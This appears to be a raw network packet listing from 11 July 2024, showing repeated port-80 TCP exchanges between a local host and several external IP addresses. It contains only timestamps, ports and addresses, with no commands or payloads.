                                    Jul 11, 2024 15:06:35.210818052 CEST4973380192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:35.216006994 CEST8049733134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:36.061991930 CEST8049733134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:36.062715054 CEST8049733134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:36.062768936 CEST4973380192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:36.715814114 CEST4973380192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:37.748212099 CEST4973480192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:37.753293037 CEST8049734134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:37.753520012 CEST4973480192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:37.773257971 CEST4973480192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:37.778750896 CEST8049734134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:37.778812885 CEST8049734134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:38.550508976 CEST8049734134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:38.604351044 CEST4973480192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:38.720355988 CEST8049734134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:38.720416069 CEST4973480192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:39.279581070 CEST4973480192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:40.316409111 CEST4973580192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:40.322453022 CEST8049735134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:40.322530985 CEST4973580192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:40.341511965 CEST4973580192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:40.348000050 CEST8049735134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:41.107443094 CEST8049735134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:41.107573986 CEST8049735134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:41.109366894 CEST4973580192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:41.119303942 CEST4973580192.168.2.6134.122.138.60
                                    Jul 11, 2024 15:06:41.124911070 CEST8049735134.122.138.60192.168.2.6
                                    Jul 11, 2024 15:06:46.240264893 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:46.245326996 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.245388985 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:46.273374081 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:46.279628992 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787440062 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787462950 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787475109 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787486076 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787494898 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787504911 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787516117 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787518024 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:46.787587881 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:46.787616014 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787626982 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787636995 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.787651062 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:46.787678003 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:46.792642117 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.792654991 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.792691946 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:46.869251013 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.869266033 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.869276047 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.869287014 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.869620085 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.869632006 CEST804973635.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:46.873261929 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:47.781475067 CEST4973680192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:48.816327095 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:48.823980093 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:48.824132919 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:48.845266104 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:48.850368023 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328574896 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328617096 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328628063 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328639030 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328649044 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328659058 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328670025 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328790903 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:49.328886986 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328896999 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.328907013 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.329047918 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:49.333775997 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.333801031 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.333929062 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:49.408164978 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.408190012 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.408200026 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.408209085 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.408221006 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.408370018 CEST804973735.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:49.408437967 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:49.408438921 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:49.408566952 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:50.356376886 CEST4973780192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:51.391885996 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:51.399022102 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:51.399554014 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:51.421675920 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:51.429162979 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:51.431119919 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573354006 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573369026 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573378086 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573385954 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573390961 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573399067 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573405027 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573412895 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573424101 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573426962 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:52.573523045 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:52.573523045 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:52.573745012 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573755980 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573765039 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573781967 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.573786020 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:52.573812962 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:52.573838949 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:52.620485067 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.620496988 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.620522022 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.620529890 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.620543003 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.620554924 CEST804973835.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:52.620639086 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:52.620640039 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:52.620640039 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:52.935408115 CEST4973880192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:53.968723059 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:53.977166891 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:53.977247953 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:53.999547958 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.006010056 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.462795019 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.462940931 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.462951899 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.462960005 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.462970972 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.462980986 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.463035107 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.463066101 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.463076115 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.463084936 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.463092089 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.463093996 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.463126898 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.463140965 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.467915058 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.467936039 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.467972994 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.552614927 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.552629948 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.552639008 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.552649975 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.552692890 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.552783966 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.552870989 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.552911043 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.552972078 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.553015947 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.553049088 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.553117990 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.553128958 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.553158998 CEST4973980192.168.2.635.212.86.52
                                    Jul 11, 2024 15:06:54.553631067 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.553642988 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.553653002 CEST804973935.212.86.52192.168.2.6
                                    Jul 11, 2024 15:06:54.553663969 CEST804973935.212.86.52192.168.2.6
Jul 11, 2024 15:06:54.553678989 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.553703070 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.553865910 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.553877115 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.553905964 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.553908110 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.553917885 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.553927898 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.553955078 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.555346012 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.555357933 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.555368900 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.555382967 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.555397034 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.559283972 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.559294939 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.559304953 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.559345007 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.649532080 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.649559975 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.649571896 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.649583101 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.649594069 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.649610996 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.649621964 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.649631977 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.649652004 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.649759054 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.652306080 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652318001 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652328968 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652338982 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652348995 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652355909 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.652359962 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652369976 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652375937 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.652380943 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652390957 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652400970 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652410030 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.652412891 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652422905 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652427912 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.652431965 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652442932 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652453899 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652463913 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652467012 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.652506113 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.652793884 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652805090 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652838945 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.652906895 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652918100 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652929068 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652939081 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652949095 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652959108 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.652961969 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.652995110 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.653125048 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.653135061 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.653147936 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:54.653167009 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.653194904 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.671879053 CEST | 49739 | 80 | 192.168.2.6 | 35.212.86.52
Jul 11, 2024 15:06:54.677062035 CEST | 80 | 49739 | 35.212.86.52 | 192.168.2.6
Jul 11, 2024 15:06:59.733335018 CEST | 49740 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:06:59.740539074 CEST | 80 | 49740 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:06:59.741482019 CEST | 49740 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:06:59.761285067 CEST | 49740 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:06:59.766175032 CEST | 80 | 49740 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:00.483117104 CEST | 80 | 49740 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:00.483494997 CEST | 80 | 49740 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:00.483608961 CEST | 49740 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:01.279733896 CEST | 49740 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:02.320624113 CEST | 49741 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:02.326004982 CEST | 80 | 49741 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:02.326076984 CEST | 49741 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:02.361686945 CEST | 49741 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:02.366760969 CEST | 80 | 49741 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:03.878617048 CEST | 49741 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:03.884021044 CEST | 80 | 49741 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:03.884099960 CEST | 49741 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:04.904922962 CEST | 49742 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:05.370608091 CEST | 80 | 49742 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:05.370728016 CEST | 49742 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:05.394306898 CEST | 49742 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:05.399159908 CEST | 80 | 49742 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:05.399328947 CEST | 80 | 49742 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:06.076211929 CEST | 80 | 49742 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:06.077119112 CEST | 80 | 49742 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:06.077188969 CEST | 49742 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:06.905282021 CEST | 49742 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:07.950149059 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:07.955231905 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:07.955354929 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:07.976079941 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:07.981080055 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:09.809554100 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:09.810148001 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:09.812695980 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:09.819363117 CEST | 49743 | 80 | 192.168.2.6 | 188.114.96.3
Jul 11, 2024 15:07:09.824191093 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.6
Jul 11, 2024 15:07:14.885431051 CEST | 49745 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:14.890407085 CEST | 80 | 49745 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:14.890511990 CEST | 49745 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:14.913315058 CEST | 49745 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:14.918365955 CEST | 80 | 49745 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:15.810538054 CEST | 80 | 49745 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:15.811005116 CEST | 80 | 49745 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:15.813685894 CEST | 49745 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:16.426281929 CEST | 49745 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:17.455549002 CEST | 49746 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:17.460536957 CEST | 80 | 49746 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:17.460762024 CEST | 49746 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:17.488663912 CEST | 49746 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:17.511428118 CEST | 80 | 49746 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:18.354121923 CEST | 80 | 49746 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:18.354137897 CEST | 80 | 49746 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:18.354207993 CEST | 49746 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:18.997293949 CEST | 49746 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:20.033233881 CEST | 49747 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:20.038885117 CEST | 80 | 49747 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:20.038963079 CEST | 49747 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:20.067791939 CEST | 49747 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:20.073313951 CEST | 80 | 49747 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:20.073326111 CEST | 80 | 49747 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:20.942728996 CEST | 80 | 49747 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:20.943025112 CEST | 80 | 49747 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:20.943793058 CEST | 80 | 49747 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:20.943866968 CEST | 49747 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:21.575229883 CEST | 49747 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:22.627312899 CEST | 49748 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:22.633902073 CEST | 80 | 49748 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:22.634001017 CEST | 49748 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:22.659610987 CEST | 49748 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:22.664509058 CEST | 80 | 49748 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:23.577620029 CEST | 80 | 49748 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:23.581715107 CEST | 80 | 49748 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:23.583642006 CEST | 49748 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:23.589768887 CEST | 49748 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:23.633245945 CEST | 80 | 49748 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:23.633342028 CEST | 49748 | 80 | 192.168.2.6 | 188.114.97.3
Jul 11, 2024 15:07:23.638089895 CEST | 80 | 49748 | 188.114.97.3 | 192.168.2.6
Jul 11, 2024 15:07:30.898000956 CEST | 49749 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:30.904681921 CEST | 80 | 49749 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:30.905432940 CEST | 49749 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:30.927772999 CEST | 49749 | 80 | 192.168.2.6 | 154.222.238.52
Jul 11, 2024 15:07:30.933275938 CEST | 80 | 49749 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:31.710470915 CEST | 80 | 49749 | 154.222.238.52 | 192.168.2.6
Jul 11, 2024 15:07:31.760680914 CEST | 49749 | 80 | 192.168.2.6 | 154.222.238.52
